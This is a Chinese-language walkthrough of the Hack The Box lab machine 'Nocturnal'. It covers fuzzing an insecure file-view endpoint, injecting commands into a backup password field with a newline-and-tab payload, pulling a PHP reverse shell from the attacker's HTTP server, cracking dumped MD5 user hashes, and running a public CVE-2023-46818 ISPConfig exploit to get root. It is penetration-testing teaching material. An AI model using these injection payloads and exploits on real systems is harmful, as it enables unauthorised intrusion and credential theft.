[HTB] nocturnal

文章发布时间:

最后更新时间:

文章总字数:
4.2k

预计阅读时间:
21 分钟

页面浏览: 加载中...

流萤

前言

忙完有空了,回来打打靶机吧。这台机子省流一下,主要是不安全的api调用、命令注入以及内网服务存在漏洞,总体来说还是比较简单的。

信息收集

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
$ sudo nmap -p- --min-rate=10000 10.10.11.64
Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 05:11 EDT
Nmap scan report for 10.10.11.64
Host is up (0.18s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 11.12 seconds

$ sudo nmap -sT -sV -O -p22,80 10.10.11.64
Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 05:13 EDT
Nmap scan report for nocturnal.htb (10.10.11.64)
Host is up (0.17s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 3.1 (94%), Linux 3.2 (94%), Linux 5.4 (94%), Linux 5.3 - 5.4 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), Linux 5.0 - 5.3 (94%), HP P2000 G3 NAS device (93%), ASUS RT-N56U WAP (Linux 3.4) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.04 seconds

$ sudo nmap -sU -p22,80 10.10.11.64
Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 05:14 EDT
Nmap scan report for nocturnal.htb (10.10.11.64)
Host is up (0.17s latency).

PORT   STATE  SERVICE
22/udp closed ssh
80/udp closed http

Nmap done: 1 IP address (1 host up) scanned in 0.53 seconds

$ sudo nmap --script=vuln -p22,80 10.10.11.64
Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 05:14 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for nocturnal.htb (10.10.11.64)
Host is up (0.17s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-fileupload-exploiter:
|
|     Couldn't find a file-type field.
|
|_    Couldn't find a file-type field.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_  /login.php: Possible admin folder
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set

Nmap done: 1 IP address (1 host up) scanned in 483.20 seconds

就开了22和80,初步漏扫也没啥特别的,当然等会可以拿nikto扫扫试试,那还是优先看看80端口的网页吧。

whatweb

1
2
3
4
5
6
7
8
9
$ sudo whatweb 10.10.11.64
http://10.10.11.64 [302 Found] Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.64], RedirectLocation[http://nocturnal.htb/], Title[302 Found], nginx[1.18.0]
ERROR Opening: http://nocturnal.htb/ - no address for nocturnal.htb

$ sudo vim /etc/hosts

$ sudo whatweb 10.10.11.64
http://10.10.11.64 [302 Found] Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.64], RedirectLocation[http://nocturnal.htb/], Title[302 Found], nginx[1.18.0]
http://nocturnal.htb/ [200 OK] Cookies[PHPSESSID], Country[RESERVED][ZZ], Email[support@nocturnal.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.64], Title[Welcome to Nocturnal], nginx[1.18.0]

我们把域名加到hosts里面。

nikto

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ sudo nikto -h nocturnal.htb
- ***** TLS/SSL support not available (see docs for SSL install) *****
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.11.64
+ Target Hostname:    nocturnal.htb
+ Target Port:        80
+ Start Time:         2025-04-24 05:24:24 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ nginx/1.18.0 appears to be outdated (current is at least 1.25.3).
+ /login.php: Admin login page/section found.
+ 7961 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2025-04-24 05:50:44 (GMT-4) (1580 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

扫出来基本没啥有用的信息。

web渗透

访问网站

在我们手动尝试网站功能的时候,可以后台跑一下目录发现和子域名FUZZ,节省时间并且以防漏过其他有用信息。

目录发现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ dirb http://nocturnal.htb

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Apr 24 05:31:26 2025
URL_BASE: http://nocturnal.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://nocturnal.htb/ ----
+ http://nocturnal.htb/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://nocturnal.htb/backups/
+ http://nocturnal.htb/index.php (CODE:200|SIZE:1524)

---- Entering directory: http://nocturnal.htb/backups/ ----

-----------------
END_TIME: Thu Apr 24 06:01:47 2025
DOWNLOADED: 9224 - FOUND: 2

$ sudo gobuster dir --url http://nocturnal.htb --wordlist /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt

我们发现其存在admin.php页面,然而我们访问会自动跳转到index.php,猜想可能是需要对应管理员账号的cookie才能访问。(实际上是的)

子域名FUZZ

1
$ wfuzz -H "Host: FUZZ.nocturnal.htb" --hc 404,403 -c -w /usr/share/Seclists/Discovery/DNS/subdomains-top1million-5000.txt http://nocturnal.htb

没啥其他子域名。

访问网站

网站首页

网站首页介绍了此网站的具体业务功能是用户可以上传Word, Excel, 以及PDF 等文件,并可随时随地下载。相当于一个文件存储服务器。涉及到文件上传,我们肯定会想到能不能上传木马啥的,总而言之,先注册个账号登录进去看看能传哪些文件,是否存在文件上传漏洞。

随便注册了一个号,登录上去直接传个test.php看看会怎么样。

响应显示只支持pdf, doc, docx, xls, xlsx, odt文件。尝试双写后缀名,以及burp修改后缀名上传失败。那我们上传个正常pdf文件看看。

noc-4

上传后可以下载,符合网页首页的介绍。我们点击下载,发现下载的url是用GET方法的http://nocturnal.htb/view.php?username=test&file=test.pdf。根据FUZZ的思想,此处username参数以及file参数显然可以FUZZ。我们先手动改改这两个参数看看会有什么反应。

noc-5

修改用户名会显示用户不存在。修改文件命为不存在的文件,网站会返回文件不存在,并给出此用户可以下载的文件。这是否意味着我们可以通过构造不存在的文件,来获取其他用户保存的文件?我们自己再注册一个账号,上传一个文件,把username改成相应的用户,发现确实可以下载。那我们就尝试FUZZ枚举一下其他存在的用户。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ wfuzz --hh 2985 -w /Tools/fuzzDict/FuzzDicts/userNameDict/user.txt -b PHPSESSID=oqjc1kfqih7dkcej6al5h9o17p 'http://nocturnal.htb/view.php?username=FUZZ&file=test1.pdf'
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://nocturnal.htb/view.php?username=FUZZ&file=test1.pdf
Total requests: 8886

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   200        128 L    247 W      3037 Ch     "admin"
000000016:   200        128 L    248 W      3105 Ch     "test"
000000645:   200        128 L    248 W      3113 Ch     "amanda"
000008252:   200        128 L    247 W      3037 Ch     "tobias"

Total time: 177.2074
Processed Requests: 8886
Filtered Requests: 8882
Requests/sec.: 50.14461

我们发现还有admin、amanda以及tobias三个用户,其中admin用户没存文件,amanda目录下有个privacy.odt,我们可以下载下来看看有没有货。

noc-6

下载下来打开发现是ITteam给用户临时密码的邮件。我们可以获取到amanda用户的密码。

1
2
3
4
5
6
7
Dear Amanda,
Nocturnal has set the following temporary password for you: ****************. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure.
The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us.
Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.

Yours sincerely,
Nocturnal's IT team

我们登录上去试试看。

noc-7

发现可以前往管理员面板。

noc-8

此页面我们可以查看各个网页的php源代码,也可以输入密码创建备份。我们查看一下admin.php的源代码。我们截取其中重要部分,也就是创建备份部分看看。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
function cleanEntry($entry) {
    $blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];

    foreach ($blacklist_chars as $char) {
        if (strpos($entry, $char) !== false) {
            return false; // Malicious input detected
        }
    }

    return htmlspecialchars($entry, ENT_QUOTES, 'UTF-8');
}

<?php
if (isset($_POST['backup']) && !empty($_POST['password'])) {
    $password = cleanEntry($_POST['password']);
    $backupFile = "backups/backup_" . date('Y-m-d') . ".zip";

    if ($password === false) {
        echo "<div class='error-message'>Error: Try another password.</div>";
    } else {
        $logFile = '/tmp/backup_' . uniqid() . '.log';
       
        $command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " .  > " . $logFile . " 2>&1 &";
        
        $descriptor_spec = [
            0 => ["pipe", "r"], // stdin
            1 => ["file", $logFile, "w"], // stdout
            2 => ["file", $logFile, "w"], // stderr
        ];

        $process = proc_open($command, $descriptor_spec, $pipes);
        if (is_resource($process)) {
            proc_close($process);
        }

        sleep(2);

        $logContents = file_get_contents($logFile);
        if (strpos($logContents, 'zip error') === false) {
            echo "<div class='backup-success'>";
            echo "<p>Backup created successfully.</p>";
            echo "<a href='" . htmlspecialchars($backupFile) . "' class='download-button' download>Download Backup</a>";
            echo "<h3>Output:</h3><pre>" . htmlspecialchars($logContents) . "</pre>";
            echo "</div>";
        } else {
            echo "<div class='error-message'>Error creating the backup.</div>";
        }

        unlink($logFile);
    }
}
?>

很显然,代码审计过后我们可以发现 $command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " . > " . $logFile . " 2>&1 &";这行代码是我们需要关注的重点。因为$password是我们可以控制的内容。但是要注意的是,密码中的[';', '&', '|', '$', ' ', '`', '{', '}', '&&']` 等字符会被过滤。

对于被过滤的空格,我们可以考虑用tab制表符绕过。

我们还注意到,在dashboard.php中,提到了数据库位置。

1
2
3
4
5
6
7
8
9
10
<?php
session_start();
if (!isset($_SESSION['user_id'])) {
    header('Location: login.php');
    exit();
}

$db = new SQLite3('../nocturnal_database/nocturnal_database.db');
$user_id = $_SESSION['user_id'];
$username = $_SESSION['username'];

我们考虑能否将这个数据库一起打包到备份文件中。我这里试了好几个命令都没成功。

1
2
3
4
5
6
7
8
9
10
11
\"	-r	../nocturnal_database/*

123	-r	../nocturnal_database/*

123	-i	../nocturnal_database/nocturnal_database.db

123	../nocturnal_database/nocturnal_database.db

"	-i	../nocturnal_database/*

123"	../nocturnal_database/nocturnal_database.db

搞了半天没效果。干脆试试能不能直接截断命令,传reverse shell上去算了。当然这里要注意,因为我们是通过url参数传递的,需要进行url编码才行。我们先尝试一下截断能不能成功。12345%0abash%09-c%09"pwd"%0a其中%0a是换行符的url编码,%09是制表符的编码,%023#的编码。

noc-9发现命令可以执行,那我们传一下reverse shell上去。我们可以去revshells.com搞一个php的pentestmonkey版本的反弹shell,本地开一个python建议http服务器传上去,然后php shell.php执行就行。

noc-10

noc-11

至此,我们就得以 以www-data的身份登陆了靶机。

提权

提权至普通用户

登录之后这个shell不知道什么情况,输入显示有问题,输入显示一团乱,这里就不记录了。

www-data的权限很低,拿不到user flag,我们要想办法提权到普通用户。我们先来到www-data的home目录,目录下的nocturnal_database有nocturnal_database.db数据库文件。我们之前一直没拿到,现在开个python3的http服务器将其下载到本地查看一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ sqlite3 nocturnal_database.db
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
uploads  users
sqlite> select * from users;
1|admin|d725aeba143f575736b07e045d8ceebb
2|amanda|df8b20aa0c935023f99ea58358fb63c4
4|tobias|55c82b1ccd55ab219b3b109b07d5061d
6|kavi|f38cde1654b39fea2bd4f72f1ae4cdda
7|e0Al5|101ad4543a96a7fd84908fd0d802e7db
8|test|098f6bcd4621d373cade4e832627b4f6
9|test@test.com|098f6bcd4621d373cade4e832627b4f6
10|testit1234|683e2726217b6911c6175bafe9da906d
11|111|698d51a19d8a121ce581499d7b701668
12|hello|5d41402abc4b2a76b9719d911017c592
13|abc|81dc9bdb52d04dc20036dbd8313ed055
14|akared|96e79218965eb72c92a549dd5a330112

我们可以发现之前fuzz出的用户admin、amanda以及tobias,另外,我们发现tobias用户是有home目录的,我们可以尝试破解一下这下hash。这里可以使用hashes网站

1
2
3
55c82b1ccd55ab219b3b109b07d5061d:*******************
f38cde1654b39fea2bd4f72f1ae4cdda:kavi
101ad4543a96a7fd84908fd0d802e7db:e0Al5

此处可以破解出tobias的密码。看看有没有存在密码复用的问题,我们尝试能不能用这个密码ssh登录。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
$ ssh tobias@10.10.11.64
tobias@10.10.11.64's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-212-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Thu 24 Apr 2025 01:15:06 PM UTC

  System load:           0.03
  Usage of /:            56.7% of 5.58GB
  Memory usage:          19%
  Swap usage:            0%
  Processes:             263
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.64
  IPv6 address for eth0: dead:beef::250:56ff:feb9:c065


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Apr 24 13:15:07 2025 from 10.10.14.40
tobias@nocturnal:~$ ll
total 36
drwxr-x--x 5 tobias tobias 4096 Oct 19  2024 ./
drwxr-xr-x 3 root   root   4096 Oct 17  2024 ../
lrwxrwxrwx 1 root   root      9 Oct 18  2024 .bash_history -> /dev/null
-rw-r--r-- 1 tobias tobias  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 tobias tobias 3771 Feb 25  2020 .bashrc
drwx------ 2 tobias tobias 4096 Oct 18  2024 .cache/
drwxrwxr-x 3 tobias tobias 4096 Oct 18  2024 .local/
-rw-r--r-- 1 tobias tobias  807 Feb 25  2020 .profile
lrwxrwxrwx 1 root   root      9 Oct 18  2024 .sqlite_history -> /dev/null
drwx------ 2 tobias tobias 4096 Apr 24 12:40 .ssh/
-rw-r----- 1 root   tobias   33 Apr 24 09:03 user.txt

成功登录,tobias的home目录下有user flag。

提权至特权用户

  1. tobias没有sudo权限,下一个

  2. 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    tobias@nocturnal:~$ find / -type f -perm -04000 2>/dev/null
    /usr/bin/passwd
    /usr/bin/mount
    /usr/bin/chfn
    /usr/bin/su
    /usr/bin/chsh
    /usr/bin/newgrp
    /usr/bin/gpasswd
    /usr/bin/at
    /usr/bin/fusermount
    /usr/bin/sudo
    /usr/bin/umount
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/openssh/ssh-keysign

    有s位的文件也用不了。

  3. 看了一下cron任务,也没啥能用的。

  4. 我们先手动遍历一下看看有没有什么值得注意的信息吧。

    1
    2
    3
    4
    5
    6
    7
    tobias@nocturnal:/tmp$ cat /etc/passwd | grep sh
    root:x:0:0:root:/root:/bin/bash
    fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
    sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
    tobias:x:1000:1000:tobias:/home/tobias:/bin/bash
    ispapps:x:1001:1002::/var/www/apps:/bin/sh
    ispconfig:x:1002:1003::/usr/local/ispconfig:/bin/sh

    我们可以观察到有sh终端的用户还有ispapps以及ispconfig ,且我们注意到,在/var/www下有相应配置文件,我们合理怀疑内网环境下有相应服务在跑。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    tobias@nocturnal:/var/www/php-fcgi-scripts$ ll
    total 16
    drwxr-xr-x 4 ispconfig ispconfig 4096 Oct 17  2024 ./
    drwxr-xr-x 6 ispconfig ispconfig 4096 Apr 14 09:26 ../
    drwxr-xr-x 2 ispconfig ispconfig 4096 Oct 17  2024 apps/
    drwxr-xr-x 2 ispconfig ispconfig 4096 Oct 17  2024 ispconfig/
    tobias@nocturnal:/var/www/php-fcgi-scripts$ ll apps/
    total 12
    drwxr-xr-x 2 ispconfig ispconfig 4096 Oct 17  2024 ./
    drwxr-xr-x 4 ispconfig ispconfig 4096 Oct 17  2024 ../
    -rwxr-xr-x 1 ispapps   ispapps    281 Oct 17  2024 .php-fcgi-starter*
    tobias@nocturnal:/var/www/php-fcgi-scripts$ ll ispconfig/
    total 12
    drwxr-xr-x 2 ispconfig ispconfig 4096 Oct 17  2024 ./
    drwxr-xr-x 4 ispconfig ispconfig 4096 Oct 17  2024 ../
    -rwxr-xr-x 1 ispconfig ispconfig  300 Oct 17  2024 .php-fcgi-starter*

  5. 刚才手动遍历到时候后台挂了个linpeas,我们印证一下刚才的想法看一下。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    ╔══════════╣ Active Ports
    ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open                        -ports
    tcp        0      0 0.0.0.0:1234            0.0.0.0:*               LISTEN      -                             
    tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                             
    tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                             
    tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -                             
    tcp        0      0 0.0.0.0:8000            0.0.0.0:*               LISTEN      -                             
    tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                             
    tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                             
    tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -                             
    tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                             
    tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
    tcp6       0      0 :::22                   :::*                    LISTEN      -

    发现8080端口确实跑着服务。(3306显然是数据库,587可能是SMTP的端口,8080是网络端口,显然应该先看一看。)我们端口转发到本机查看。ssh -L 9999:127.0.0.1:8080 tobias@10.10.11.64

    发现是一个ispconfig网站。

    noc-12

尝试登陆凭证复用tobias:**********发现登录不进去,尝试root,admin等常见用户名发现,admin可以成功登录。

noc-13

登陆进来,我们在help页面发现了ISPConfig 的版本信息:Version: 3.2.10p1。那我们看看这个版本的ISPConfig服务是否存在可以利用的漏洞。直接搜索ISPConfig 3.2 exploit,发现存在CVE-2023-46818漏洞可以利用。

参照readme下载exploit.py。我们刚才已经试出来了管理员密码,我们对着尝试一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ python3 exploit.py http://127.0.0.1:9999 admin ******************
[+] Target URL: http://127.0.0.1:9999/
[+] Logging in with username 'admin' and password '******************'
[+] Injecting shell
[+] Launching shell

ispconfig-shell# whoami
root


ispconfig-shell# ls -la /root
total 36
drwx------  6 root root 4096 Apr 24 13:31 .
drwxr-xr-x 18 root root 4096 Mar 18 13:43 ..
lrwxrwxrwx  1 root root    9 Oct 18  2024 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  2 root root 4096 Mar  4 17:11 .cache
drwxr-xr-x  3 root root 4096 Oct 18  2024 .local
lrwxrwxrwx  1 root root    9 Oct 18  2024 .mysql_history -> /dev/null
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r-----  1 root root   33 Apr 24 13:31 root.txt
drwxr-xr-x  2 root root 4096 Apr 14 09:11 scripts
drwx------  2 root root 4096 Oct  4  2024 .ssh

成功拿下root权限。